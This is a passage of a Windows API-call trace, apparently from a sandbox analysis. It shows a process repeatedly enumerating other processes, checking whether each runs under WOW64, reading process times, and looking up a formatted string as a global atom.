	[0095.503] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.503] CloseHandle (hObject=0x248) returned 1
	[0095.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.580] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.581] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.582] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.583] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.583] CloseHandle (hObject=0x248) returned 1
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.583] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.583] CloseHandle (hObject=0x248) returned 1
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.583] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.583] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.583] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.584] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.584] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.584] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.584] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.584] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.584] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.584] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.584] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.584] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.584] CloseHandle (hObject=0x248) returned 1
	[0095.584] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.585] CloseHandle (hObject=0x248) returned 1
	[0095.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.585] CloseHandle (hObject=0x248) returned 1
	[0095.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.585] CloseHandle (hObject=0x248) returned 1
	[0095.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.585] CloseHandle (hObject=0x248) returned 1
	[0095.585] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.585] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.585] CloseHandle (hObject=0x248) returned 1
	[0095.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.586] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.586] CloseHandle (hObject=0x248) returned 1
	[0095.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.586] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.586] CloseHandle (hObject=0x248) returned 1
	[0095.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.586] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.586] CloseHandle (hObject=0x248) returned 1
	[0095.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.586] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.586] CloseHandle (hObject=0x248) returned 1
	[0095.586] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.587] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.587] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.587] CloseHandle (hObject=0x248) returned 1
	[0095.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.588] CloseHandle (hObject=0x248) returned 1
	[0095.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.588] CloseHandle (hObject=0x248) returned 1
	[0095.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.588] CloseHandle (hObject=0x248) returned 1
	[0095.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.588] CloseHandle (hObject=0x248) returned 1
	[0095.588] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.588] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.589] CloseHandle (hObject=0x248) returned 1
	[0095.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.589] CloseHandle (hObject=0x248) returned 1
	[0095.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.589] CloseHandle (hObject=0x248) returned 1
	[0095.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.589] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.589] CloseHandle (hObject=0x248) returned 1
	[0095.589] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.590] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.590] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.590] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.590] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.590] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.590] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.591] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.591] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.591] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.591] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.591] CloseHandle (hObject=0x248) returned 1
	[0095.591] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.591] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.591] CloseHandle (hObject=0x248) returned 1
	[0095.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.666] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.668] CloseHandle (hObject=0x248) returned 1
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.668] CloseHandle (hObject=0x248) returned 1
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.668] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.668] CloseHandle (hObject=0x248) returned 1
	[0095.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.669] CloseHandle (hObject=0x248) returned 1
	[0095.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.669] CloseHandle (hObject=0x248) returned 1
	[0095.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.669] CloseHandle (hObject=0x248) returned 1
	[0095.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.669] CloseHandle (hObject=0x248) returned 1
	[0095.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.669] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.669] CloseHandle (hObject=0x248) returned 1
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.670] CloseHandle (hObject=0x248) returned 1
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.670] CloseHandle (hObject=0x248) returned 1
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.670] CloseHandle (hObject=0x248) returned 1
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.670] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.670] CloseHandle (hObject=0x248) returned 1
	[0095.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.671] CloseHandle (hObject=0x248) returned 1
	[0095.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.671] CloseHandle (hObject=0x248) returned 1
	[0095.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.671] CloseHandle (hObject=0x248) returned 1
	[0095.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.671] CloseHandle (hObject=0x248) returned 1
	[0095.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.671] CloseHandle (hObject=0x248) returned 1
	[0095.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.671] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.672] CloseHandle (hObject=0x248) returned 1
	[0095.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.673] CloseHandle (hObject=0x248) returned 1
	[0095.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.673] CloseHandle (hObject=0x248) returned 1
	[0095.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.673] CloseHandle (hObject=0x248) returned 1
	[0095.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.673] CloseHandle (hObject=0x248) returned 1
	[0095.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.674] CloseHandle (hObject=0x248) returned 1
	[0095.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.674] CloseHandle (hObject=0x248) returned 1
	[0095.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.674] CloseHandle (hObject=0x248) returned 1
	[0095.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.674] CloseHandle (hObject=0x248) returned 1
	[0095.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.674] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.675] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.675] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.675] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.675] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.676] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.676] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.676] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.676] CloseHandle (hObject=0x248) returned 1
	[0095.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.676] CloseHandle (hObject=0x248) returned 1
	[0095.752] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.753] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.755] CloseHandle (hObject=0x248) returned 1
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
